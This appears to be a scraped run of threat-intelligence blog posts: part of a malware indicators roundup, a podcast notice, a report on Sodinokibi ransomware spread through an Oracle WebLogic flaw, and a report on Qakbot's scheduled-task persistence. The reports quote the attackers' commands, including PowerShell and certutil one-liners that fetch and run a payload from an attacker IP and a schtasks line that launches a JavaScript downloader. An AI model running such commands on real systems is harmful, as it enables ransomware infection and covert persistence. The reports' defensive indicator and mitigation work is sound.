<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: Start
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: ErrorControl
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: ImagePath
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: DisplayName
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: WOW64
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK
Value Name: ObjectName
40
<HKU>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon 39
<HKU>\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders 39
<HKLM>\SOFTWARE\Microsoft\ESENT\Process\guiddefribbon\DEBUG 39
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A}\9c-aa-fb-e9-56-c8 2
MutexesOccurrences
Global\I98B68E3C40
Global\M98B68E3C40
\BaseNamedObjects\Global\M3C28B0E439
\BaseNamedObjects\Global\I3C28B0E439
Global\Nx534F51BC2
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
152[.]168[.]82[.]16716
189[.]166[.]20[.]11316
103[.]11[.]83[.]5216
197[.]91[.]152[.]9315
77[.]82[.]85[.]3511
66[.]228[.]45[.]12910
216[.]98[.]148[.]15610
177[.]231[.]157[.]1896
65[.]49[.]60[.]1634
201[.]248[.]5[.]1974
82[.]0[.]19[.]404
165[.]255[.]52[.]1924
31[.]172[.]86[.]1833
45[.]33[.]35[.]1033
181[.]37[.]126[.]23
239[.]255[.]255[.]2502
209[.]85[.]144[.]1092
74[.]6[.]141[.]432
81[.]169[.]145[.]1032
104[.]236[.]185[.]252
181[.]30[.]126[.]662
179[.]62[.]249[.]1892
204[.]232[.]250[.]2521
81[.]19[.]78[.]831
216[.]128[.]11[.]51
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
smtpout[.]secureserver[.]net2
imap[.]strato[.]de2
SMTP[.]AMAZON[.]COM1
mail[.]strato[.]de1
mail[.]gmx[.]a1
MAIL[.]CLOVER[.]COM1
mail[.]hotmail[.]de1
mail[.]fsfsc[.]org1
mail[.]pearl[.]ch1
mail[.]hub[.]afsinc[.]org1
smtp[.]gatehousesupplies[.]com1
smtp[.]bonuscard[.]ch1
smtp[.]cranespotters[.]com1
mail[.]securemail[.]us[.]cibc[.]com1
smtp[.]employmentsolutionsinc[.]org1
mail[.]tecnoparaguay[.]com[.]py1
www[.]chetgreen[.]com1
smtp[.]account[.]zopim[.]com1
smtp[.]prodxbm[.]co1
smtp[.]creditkarma[.]com1
smtp[.]my[.]yotpo[.]com1
SMTP[.]PERX[.]COM1
smtp[.]bobjohnson[.]com1
smtp[.]facturacioncapufe[.]com[.]mx1
smtp[.]app[.]intercom[.]io1
See JSON for more IOCs
Files and or directories createdOccurrences
%SystemRoot%\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat40
%System32%\guiddefribbon.exe (copy)3
%SystemRoot%\SysWOW64\UtHbYIvdhlNvu.exe1
%SystemRoot%\SysWOW64\R597iayBjMdh.exe1
%SystemRoot%\SysWOW64\C7eHkb20PeU6wpDtjp.exe1
%SystemRoot%\SysWOW64\1MEitC9prK.exe1
%SystemRoot%\SysWOW64\kmnu.exe1
%SystemRoot%\SysWOW64\4I7gXzdy4.exe1
%SystemRoot%\SysWOW64\5x2P.exe1
%System32%\HwVezokkuv.exe1
%SystemRoot%\SysWOW64\ISUH5rlS.exe1
%SystemRoot%\SysWOW64\xFkV4xOuG.exe1
%SystemRoot%\SysWOW64\7tooAA2H.exe1
%SystemRoot%\SysWOW64\dqhwpEfDiqdYk3.exe1
%SystemRoot%\SysWOW64\98SvoQAlyGHCi.exe1
%SystemRoot%\SysWOW64\Y9t7.exe1
%SystemRoot%\SysWOW64\OEkk.exe1
%SystemRoot%\SysWOW64\QEeaZTtWugEn.exe1
%SystemRoot%\SysWOW64\faEA7KV70hn5.exe1
%System32%\hLikoqY.exe1
%SystemRoot%\SysWOW64\oURffFdtgFONll.exe1
%SystemRoot%\SysWOW64\b1zR.exe1
%SystemRoot%\SysWOW64\bEjEWEYxmjgCJVecQcp.exe1
%SystemRoot%\SysWOW64\yVYv57xuqKB.exe1
%SystemRoot%\SysWOW64\oglx98jdm6.exe1
See JSON for more IOCs
File Hashes
  • 0106fad7a1ceb64a7d2ebed424ce86d979ac976cb352326c0fca9c7d0ac5330f
  • 0123e3c82d1b40e5b1ec1cb62a30317cb209371dc8fe546f10b96c6113e37229
  • 0911c843ef0b50a6b7359384d774350c43ea81970e47b6390782a3b59619df23
  • 0b5980e79cb0b4565db500cdb5b15970624aa8f3fce0bc14a13a097fc9c098ca
  • 0fe4721f05bcae958a1e294f92832144acd17791a850507bd98572347968eb6e
  • 14e5b08440e75c48bd1ff1486c8b36f32fb0cd4d21dbc138861a0b9af90aba7f
  • 1cd3db53176d88f4b7244429ef03ee120373c066335a8a5b81f94e2597188636
  • 1cda16c8d2e935d3ed762d5c7d18c945ebcfc183898ac5b87846dca084e043cf
  • 1ec9145cc88f7e619398955d6377ea4a6aa2f5fc8d53b87a467468d284352d61
  • 22d4075bf5828ede0c20dbea9023775ebbffb6e867272945a6a69697ea015c8c
  • 2430252f3c13ab866847db4905ff53380375d818085358a6f2d158f5ca6f9847
  • 25806bac5ca5b7b3dc6f1cdcbc4d72ade84828ae4173a858c3e9fe028d51b7e9
  • 270696e681aae3f24c7a3886f75952fd82c2bc94374c7fa1e72c5ae1583efcc0
  • 2d979f92140e9b7ad385cfe47c59e960ef5df19bff9388313908a14464bc0064
  • 3286340a92b48cf2a64c066f4cec1b078d9c23df987dd9aa07f249fffc5a9cbf
  • 377ca271dd3000fe310674488c93822601be7434325661f4158e8e64e83ab247
  • 3e77f7b1c2a160ebd1f6bda9235c9ae43f057cba38f6ef77f50df7dd1bd6d229
  • 448d67c96c008988d24046abb6a7e736db585c79b83c1e831023649133d83dad
  • 45ee3965183c5fecff0268fa7480aad3f4b0364b3e63fbc4259a1669f1cc48f8
  • 478968aeea42221e0c760a811af1560eeaa6489b77cdf69b4ae3763c59e60be0
  • 48900a85a1a4afcf216ea9912176bb20edab059d1bb27d02caa6fbbcc060d35e
  • 4937ac330845c1504e65a3655050ffa5a8cfc3602298ecef627ca8d4114631fe
  • 5ca10a11eb88b1c5e38e0359419fe8d39a321571e89268a578d2a0e272004caf
  • 61ffe36301e722b85088cfceb5d5a703e57eff907119ef305dc92da45c254aaf
  • 65eb33dbb0f1a4e78ffdcc5dbed725ac929c7c917923544af329226ddecf0f14
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP




ThreatGrid



Umbrella



Win.Malware.Mikey-6953803-0


Indicators of Compromise


Registry KeysOccurrences
<HKLM>\Software\Wow6432Node\Microsoft\Tracing\RASAPI32 15
<HKLM>\Software\Wow6432Node\Microsoft\Tracing\RASMANCS 15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
Value Name: EnableFileTracing
15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
Value Name: EnableConsoleTracing
15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
Value Name: FileTracingMask
15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
Value Name: ConsoleTracingMask
15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
Value Name: MaxFileSize
15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASAPI32
Value Name: FileDirectory
15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
Value Name: EnableFileTracing
15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
Value Name: EnableConsoleTracing
15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
Value Name: FileTracingMask
15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
Value Name: ConsoleTracingMask
15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
Value Name: MaxFileSize
15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\RASMANCS
Value Name: FileDirectory
15
<HKLM>\System\CurrentControlSet\Control\SecurityProviders\Schannel 2
MutexesOccurrences
DSKQUOTA_SIDCACHE_MUTEX14
.NET CLR Data_Perf_Library_Lock_PID_3786
.NET CLR Networking 4.0.0.0_Perf_Library_Lock_PID_3786
.NET CLR Networking_Perf_Library_Lock_PID_3786
.NET Data Provider for Oracle_Perf_Library_Lock_PID_3786
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_3786
.NET Memory Cache 4.0_Perf_Library_Lock_PID_3786
.NETFramework_Perf_Library_Lock_PID_3786
ASP.NET_1.1.4322_Perf_Library_Lock_PID_3786
ASP.NET_4.0.30319_Perf_Library_Lock_PID_3786
ASP.NET_Perf_Library_Lock_PID_3786
BITS_Perf_Library_Lock_PID_3786
ESENT_Perf_Library_Lock_PID_3786
Lsa_Perf_Library_Lock_PID_3786
MSDTC Bridge 3.0.0.0_Perf_Library_Lock_PID_3786
MSDTC Bridge 4.0.0.0_Perf_Library_Lock_PID_3786
MSDTC_Perf_Library_Lock_PID_3786
Outlook_Perf_Library_Lock_PID_3786
PerfDisk_Perf_Library_Lock_PID_3786
PerfNet_Perf_Library_Lock_PID_3786
PerfOS_Perf_Library_Lock_PID_3786
PerfProc_Perf_Library_Lock_PID_3786
RemoteAccess_Perf_Library_Lock_PID_3786
SMSvcHost 3.0.0.0_Perf_Library_Lock_PID_3786
SMSvcHost 4.0.0.0_Perf_Library_Lock_PID_3786
See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
64[.]188[.]12[.]1823
185[.]212[.]130[.]142
185[.]212[.]129[.]1842
46[.]249[.]59[.]1222
185[.]225[.]69[.]1012
52[.]36[.]131[.]2291
54[.]248[.]125[.]2471
104[.]18[.]39[.]181
103[.]11[.]102[.]481
104[.]28[.]16[.]1491
202[.]181[.]185[.]1621
43[.]241[.]73[.]2211
202[.]181[.]196[.]261
202[.]155[.]223[.]181
103[.]13[.]50[.]1801
54[.]183[.]102[.]221
116[.]251[.]204[.]1361
206[.]218[.]248[.]1731
203[.]185[.]61[.]1961
101[.]78[.]151[.]1721
192[.]185[.]5[.]691
103[.]13[.]50[.]281
115[.]160[.]155[.]941
118[.]143[.]28[.]561
103[.]13[.]50[.]621
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
gangbulk[.]icu2
striblingm[.]pw2
SHOP[.]HPINH[.]HK1
ajqqn[.]hk1
SHOP[.]HPC[.]HK1
SHOP[.]HYHEB[.]HK1
ALODRINK[.]HK1
SHOP[.]ICAN[.]HK1
ALIVECOR[.]HK1
SHOP[.]IAN[.]COM[.]HK1
shop[.]imylv[.]hk1
shop[.]ina[.]hk1
SHOP[.]HY[.]COM[.]HK1
SHOP[.]ICXLB[.]HK1
SHOP[.]HOTFROG[.]HK1
SHOP[.]HYY[.]COM[.]HK1
shop[.]icfp[.]hk1
SHOP[.]HYPOXI[.]HK1
shop[.]htv[.]hk1
AIR[.]HK1
SHOP[.]IHK[.]HK1
shop[.]imore[.]hk1
SHOP[.]HUGOMAX[.]HK1
shop[.]hps[.]com[.]hk1
shop[.]hoops[.]hk1
See JSON for more IOCs
Files and or directories createdOccurrences
%APPDATA%\Mozilla\Firefox\Profiles\1lcuq8ab.default\cookies.sqlite.bak10
%APPDATA%\Mozilla\Firefox\Profiles\1lcuq8ab.default\places.sqlite.bak10
\??\scsi#disk&ven_red_hat&prod_virtio#4&2556063a&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1
%TEMP%\tmpA4A.tmp1
%TEMP%\tmp2BCD.tmp1
%TEMP%\4a5beb4e303c4a1a9bcd3624dfec7cbe.exe1
%TEMP%\tmp4167.tmp1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe1
%TEMP%\4a5beb4e303c4a1a9bcd3624dfec7cbe.exe.pid1
%TEMP%\s.bat1
%TEMP%\tmpCAF3.tmp1
%TEMP%\tmpB734.tmp1
%TEMP%\tmpB63A.tmp1
%TEMP%\tmp77F3.tmp1
%TEMP%\tmp742C.tmp1
%TEMP%\tmp6695.tmp1
%TEMP%\tmp717E.tmp1
File Hashes
  • 0ee1dc48bdc775152554357cbb9190834a58a5ccbc01e27d20f2cf0064211206
  • 0ffa3428f95f2a5c79a169976d3c5d58fa885cc05265c41fa4dcf4e33be17a12
  • 1ee4c1201f038a48a854fd993455142b15acbf44b41a8820af4790f17c31fba5
  • 45945d97bf9f1cb63b1b7a74629bb90567933a981d2cc77f4dc46018c6f8c169
  • 471f646bc59743f27f1bb08ef688a699c3ff268eeab403cea8ec7467f303c2f3
  • 4725b43862585b4e78f06ef7209a32434dcfe809986a19cb9b89bcb673a6a555
  • 49065e33bbdf2b25f4cdd1a8994df53135a9b41b725bd94958682325fb8c237a
  • 58fb3bc46e231b9ad07f5f8210a2acf1d225c25e287eee73553ae280ac9e89d9
  • 6f79069e751211f3077e90bd4e20c7116f8c3c9c41fa1ce7eacbd7710fdecf0e
  • 96667406cc9e8bb5e9da9e418a4b4196900364cc100d965b5d2714c62eb5e402
  • 9ac94b8404ee4300330c56257c66f77662904a2dc7f732125f36365c4a788129
  • 9e87a651befb171f0145718bc52d4d8b1a40f420cbb8d66d3e8b60e4377fa8c7
  • be140dfc59df6e21eb3b799cfe6511b9b8c5d010be0079b5f64a2b1dc3ab4fcb
  • f1e262b02e2b357f56225184539e2a3c35623b15397a85f343a368c5999dbd5d
  • f7f5d6e71a69332960e2025790db65c9bd29037157930a599c28969645bec5c9

Coverage


Screenshots of Detection

AMP



ThreatGrid



Umbrella



Exprev

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
  • Madshi injection detected (3400)
    Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
  • Kovter injection detected (2256)
    A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
  • PowerShell file-less infection detected (1079)
    A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.
  • Process hollowing detected (503)
    Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
  • Gamarue malware detected (190)
    Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
  • Atom Bombing code injection technique detected (107)
    A process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.
  • Suspicious PowerShell execution detected (100)
    A PowerShell command has attempted to bypass execution policy to run unsigned or untrusted script content. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
  • Dealply adware detected (87)
    DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
  • Excessively long PowerShell command detected (85)
    A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
  • Trickbot malware detected (75)
    Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.

Beers with Talos Ep. #52: I don't trust you because I care

$
0
0


Beers with Talos (BWT) Podcast Ep. #52 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Recorded April 26, 2019 - Since Craig decided to skip the podcast today, we decided to invite one of Austin’s top actual security experts, Wendy Nather, to stop by. After Mitch is done being a fanboy, Wendy breaks down zero-trust, beyond the marketing story of a world without a perimeter. We spend most of the time discussing what zero trust looks like as a security model and how it can be implemented in the real world. We also dive into usability and “good enough” security.

The timeline:

  • 1:20 — Roundtable: Craig is playing hooky, Wendy finds two acres of lost data centers
  • 9:00 — Meet Wendy Nather, head of advisory CISOs at Cisco Duo. She has three times more Twitter followers than Craig.
  • 17:00 — What exactly does zero-trust actually mean?
  • 36:00 — Why we can’t have nice things, like banana bread?
  • 50:30 — Closing thoughts, parting shots

Some other links:

==========

Featuring: Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC) with special guest Wendy Nather (@WendyNather).
Hosted by Mitch Neff (@MitchNeff).

Subscribe via iTunes (and leave a review!)


Subscribe to the Threat Source newsletter


Give us your feedback and suggestions for topics: beerswithtalos@cisco.com

Sodinokibi ransomware exploits WebLogic Server vulnerability

$
0
0
This blog was authored by Pierre Cadieux, Colin Grady, Jaeson Schultz and Matt Valites

Attackers are actively exploiting a recently disclosed vulnerability in Oracle WebLogic to install a new variant of ransomware called "Sodinokibi." Sodinokibi attempts to encrypt data in a user's directory and delete shadow copy backups to make data recovery more difficult. Oracle first patched the issue on April 26, outside of their normal patch cycle, and assigned it CVE-2019-2725. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of 9.8/10. Attackers have been making use of this exploit in the wild since at least April 17. Cisco's Incident Response (IR) team, along with Cisco Talos, are actively investigating these attacks and Sodinokibi.



Initial stages of the ransomware attack occurred on April 25, the day before Oracle released their update. This was a trial to see whether the server was exploitable.


April 25, 2019 activity showing the initial activity preceding the ransomware deployment.


On April 26, 2019, the attackers made an HTTP connection to a different vulnerable server, requesting the AsyncResponderService of the Oracle WebLogic Server.


Activity from April 26. The attackers are downloading the Sodinokibi ransomware.


Historically, most varieties of ransomware have required some form of user interaction, such as a user opening an attachment to an email message, clicking on a malicious link, or running a piece of malware on the device. In this case, the attackers simply leveraged the Oracle WebLogic vulnerability, causing the affected server to download a copy of the ransomware from attacker-controlled IP addresses 188.166.74[.]218 and 45.55.211[.]79. The 188.166.74[.]218 IP address is also home to a pair of other malicious domains unrelated to this ransomware attack: arg0s-co[.]uk, which is likely a phishing domain, and projectstore[.]guru, a domain with bogus PDF-related Google search results. The other IP, 45.55.211[.]79, hosts a pair of legitimate Chilean domains, and appears to have been infected and repurposed by the attackers. The attackers were ultimately successful at encrypting a number of customer systems during this incident.

Cisco IR Services and Talos observed the attack requests originating from 130.61.54[.]136. The HTTP POST request contained arguments to a cmd.exe instruction — a PowerShell command to download a file called "radm.exe" from host 188.166.74[.]218, then save that file locally and execute it.

cmd /c powershell.exe wget http[:]//188.166.74[.]218/radm.exe -outfile %TEMP%/radm.exe&cmd.exe /c %TEMP%\\radm.exe

In addition to PowerShell, we also observed the attackers creatively passing the certutil utility to cmd to download a file:

cmd /c cmd.exe /c certutil.exe -urlcache -split -f http[:]//188.166.74[.]218/radm.exe %TEMP%/radm.exe&cmd.exe /c %TEMP%\\radm.exe

Besides "radm.exe," researchers observed multiple file names in the PowerShell and certutil commands, including:

hxxp[:]//188.166.74[.]218/office.exe
hxxp[:]//188.166.74[.]218/radm.exe
hxxp[:]//188.166.74[.]218/untitled.exe
hxxp[:]//45.55.211[.]79/.cache/untitled.exe

Once detonated in Threat Grid, the sandbox identified this sample as potential ransomware.



The website VirusTotal successfully detected the same binary hash on 43 out of 71 different engines.

Below, we can see the malicious file "untitled.exe" using "cmd.exe" to execute the vssadmin.exe utility. This action is a common tactic of ransomware to prevent users from easily recovering their data. It attempts to delete default Windows backup mechanisms, otherwise known as "shadow copies," to prevent recovery of the original files from these backups.



The ransom note, in this case, directs victims to either a .onion website on the Tor network or on the public web at the domain decryptor[.]top, registered on March 31 this year. With Sodinokibi, each encrypted system sees a distinct encrypted file extension. The ransom note filename also includes this extension as a prefix (ex. 88f2947s-HOW-TO-DECRYPT.txt).



The Gandcrab affiliate connection


After finishing deploying Sodinokibi ransomware inside the victim's network, the attackers followed up with an additional CVE-2019-2725 exploit attempt approximately eight hours later. However, this time, the attackers chose to distribute Gandcrab v5.2. We find it strange the attackers would choose to distribute additional, different ransomware on the same target. Sodinokibi being a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab.

Conclusion


This attack is notable because of the attackers' use of a zero-day exploit to distribute ransomware. Whereas previously we have witnessed ransomware attackers taking advantage of unpatched systems to install and laterally propagate ransomware, this zero-day exploitation method could work on otherwise fully-patched systems.

The victims in this ransomware attack were able to activate their Incident Response Retainer with Cisco IR Services, and they received immediate support and advice on managing the incident. Immediate actions taken likely prevented a more significant outage.

Due to the ubiquity of Oracle WebLogic servers and the ease of exploitation of this vulnerability, Talos expects widespread attacks involving CVE-2019-2725, and we recommend the following actions. Any number of layered controls could prevent or otherwise deter this type of attack, including:

  • Patch WebLogic as soon as possible against CVE-2019-2725.
  • Log and centrally collect web, application, and operating systems events.
  • Restrict the access of the account used to run the WebLogic process
  • Monitor for signs of compromise:
    • Egress network communications from data center systems.
    • Ransomware "Canary" files.
    • External HTTP POSTs to new URIs.
    • Web shells.
    • Unexpected activity of service/system accounts (WebLogic user).
  • Scan for, understand, and mitigate your vulnerability posture.
  • Restrict egress Data Center communications.
  • Segment the network for defense and monitoring.
  • Control URL access (in this case external access to "/_async/*" and "/wls-wsat/*").
  • Plan for Disaster Recovery, including maintaining and testing data backups and recovery.
  • Configure PowerShell to execute only signed scripts.



Indicators of Compromise (IoC)


Ransomware samples:
0fa207940ea53e2b54a2b769d8ab033a6b2c5e08c78bf4d7dade79849960b54d
34dffdb04ca07b014cdaee857690f86e490050335291ccc84c94994fa91e0160
74bc2f9a81ad2cc609b7730dbabb146506f58244e5e655cbb42044913384a6ac
95ac3903127b74f8e4d73d987f5e3736f5bdd909ba756260e187b6bf53fb1a05
fa2bccdb9db2583c2f9ff6a536e824f4311c9a8a9842505a0323f027b8b51451

Distribution URLs:
hxxp://188.166.74[.]218/office.exe
hxxp://188.166.74[.]218/radm.exe
hxxp://188.166.74[.]218/untitled.exe
hxxp://45.55.211[.]79/.cache/untitled.exe

Attacker IP:
130.61.54[.]136

Attacker Domain:
decryptor[.]top

Qakbot levels up with new obfuscation techniques

$
0
0

Ashlee Benge of Cisco Talos and Nick Randolph of the Threat Grid Research and Efficacy team authored this blog post.


Executive summary

Qakbot, also known as Qbot, is a well-documented banking trojan that has been around since 2008. Recent Qakbot campaigns, however, are utilizing an updated persistence mechanism that can make it harder for users to detect and remove the trojan. Qakbot is known to target businesses with the hope of stealing their login credentials and eventually draining their bank accounts. Qakbot has long utilized scheduled tasks to maintain persistence. In this blog post, we will detail an update to these schedule tasks that allows Qakbot to maintain persistence and potentially evade detection.

Infection chain

Victims of this malware are typically infected via a dropper. Once infected, a victim machine will create a scheduled task. This task will execute a JavaScript downloader that makes a request to one of several hijacked domains.

The command line string that create this task is:

C:\Windows\system32\schtasks.exe /create /tn {guid} /tr cmd.exe /C "start /MIN C:\Windows\system32\cscript.exe /E:javascript "C:\Users\USERNAME\ymwoyf.wpl" /sc WEEKLY /D TUE,WED,THU /ST 12:00:00 /F

This downloader is executed using the command:

cmd.exe /C start /MIN C:\Windows\system32\cscript.exe /E:javascript C:\ProgramData\\puigje.wpl"
C:\Windows\system32\cscript.exe /E:javascript C:\ProgramData\puigje.wpl

Cisco Talos first observed a spike in requests to these hijacked domains on April 2, 2019. This coincides with DNS changes made to these domains on March 19, 2019. Additionally, the comment string "CHANGES 15.03.19" is contained within the malicious JavaScript downloader, suggesting this actor updated the code on March 15. This indicates that these changes to the Qbot persistence mechanism seem to coincide with the launch of a new campaign.


An example downloader with dated comment line.

This downloader always requests the URI "/datacollectionservice[.]php3." from these hijacked domains. The domains used by the downloader for this request are XOR encrypted at the beginning of the JavaScript. The response to this request is obfuscated data that will be saved as (randalpha)_1.zzz and (randalpha)_2.zzz. The first 1,000 bytes of data are saved to the first .zzz file, while the remainder goes to the second file. The data in these files is decrypted with the code contained in the JavaScript downloader.

An example of the JavaScript used to decode the obfuscated .zzz files.

Additionally, a scheduled task is created to execute a batch file.

An example of this batch file.

This code serves to reassemble the malicious Qakbot executable from the two .zzz files, using the type command. The two .zzz files are then deleted after the reassembled executable is run. The functionality of the Qakbot malware remains the same.

Conclusion

There has been a change in the infection chain of Qakbot that makes it more difficult for traditional anti-virus software to detect. This may allow the download of the malware to go undetected, as the malware is obfuscated when it is downloaded and saved in two separate files. These files are then decrypted and reassembled using the type command. Detection that is focused on seeing the full transfer of the malicious executable would likely miss this updated version of Qakbot. Because of this update to persistence mechanisms, the transfer of the malicious Qbot binary will be obfuscated to the point that some security products could miss it.

Coverage

Ways our customers can detect and block this threat are listed below.


Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware detailed in this post. Below is a screenshot showing how AMP can protect customers from this threat. Try AMP for free here.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.


Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Additional protections with context to your specific environment and threat data are available from the Firepower Management Center.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs


C2 domains observed

lg[.]prodigyprinting[.]com
hp[.]prodigyprinting[.]com
layering[.]wyattspaintbody[.]net
painting[.]duncan-plumbing[.]com

Qakbot hashes

00e4f65b721b334c3aa40e0c0fdc63107965874981fbfef1fc6a3ebb9d6c8d1c
042b8c8ae4525b7fd067c6960def5bb01817bf884db9db0db42c2a3cb10ff327
0633c16d45f6fdc9fd6ba13c86572bfb571e2307ea051e2c119b59458000b51d
0dbf3f0a6a6b77eddd6e63849f2cea98edb855847a51ec313e7b764c5a5a3a59
104d491cd7c6e3f7930edb780bed08fc88012a0f7f77f01ef987f270c9169b49
1430582ad86023fe4b75f4721158ab72c28bef13592ad4462ac30f7b0784cc37
20e53f19fb58b36c93fff100d0e003ff6e88017d6ee6ae8e56d72ba3e1827250
21898a62a58602b67b39ea4c5ce971be4d73c861a1abff22337d2531f7b18d29
2f5b2a72e40226c54871113b18d4e62c76d4cd05eb50a84c02774ed13daee411
33e97cb8c1508b7795748e54634ebcd9b04259f14ef1f5dce32bad765885649a
386796dcf6f731d43182b57dcaf1f7a9db346f84fdde59ea4c40e574983dd4e3
3bd16f8213ff33b7e6ad5ba0974c2674e9a8f5a4b2a914006dbe060cec57d56e
3c5fe3251afef44143b119f6ca45503dda70b51e006b882e9b0666a380c99774
3f1eb5d603074d6d56d99cad4a31fad015e45855e9dbf0ea3ae1969077358a25
42f6a0b64b8dda86c3905a12c3921ead06fa3f24b1231d1bcac7762fb54437d2
45cbe796d27e48e8983eba169a72c5c3da03053ffd9ea519173482bed8af666e
47df7cecfaf49a99c3ac8ebd5b47e4afe46658428dfc4818d7a968e0d84d6e19
482f9255b94f1a7813e3cf631ac4bd14c559694b6162fadc6888a83d5c8f18dd
485dda6eb0574979a04ba831df8ca0588cf034b3005d17153fb56088d31fd487
4ca4665d30d38df77d13ed756d2310faaabc42e3eb3a1b18c26e1698f3e073bd
4efdd3448fbaaa164c0735891512ece65f78d9160ffef0f1983e9539b1c502d7
507d93bc04f4a52e451ec8e212f52397ff25b93e4ea3c9ab54fdd24c2c200171
523789702a134745c78a1430ccc1704650181b2f4f773862d44d45ccf139b93f
52b9d903cf6e578f781af3b1f38263fb2d81282a188e25cacf765d723d3de563
5ac4fbe00b773cbeb52c58234a5d2676f1cf0961385eb6b73934fccdf82a6605
630ba9a1630e90bdbe3d1f63161dc07714818f5b3010f6f9af6e624746529975
6372b115bd5eb33d586519ce478ce161420c53e3d92103f2d8b2bb0e6efedfb8
63cb6cf78b6263ccb6308de73f8084debacf62b88315809473f5b7ffbf9fcbf8
668e1c7275dd3000fd0f24f2a5f9004fc5fd5293c646ad44882122889a99f353
68b9de2981e3d74fbc83b3e26a45eda5611fd1791362d775e12b6db5f1f5f646
6d0f5953b6a2234e00e720b297cdfa12a4d9074a92b85e9e5c508938b5907a0a
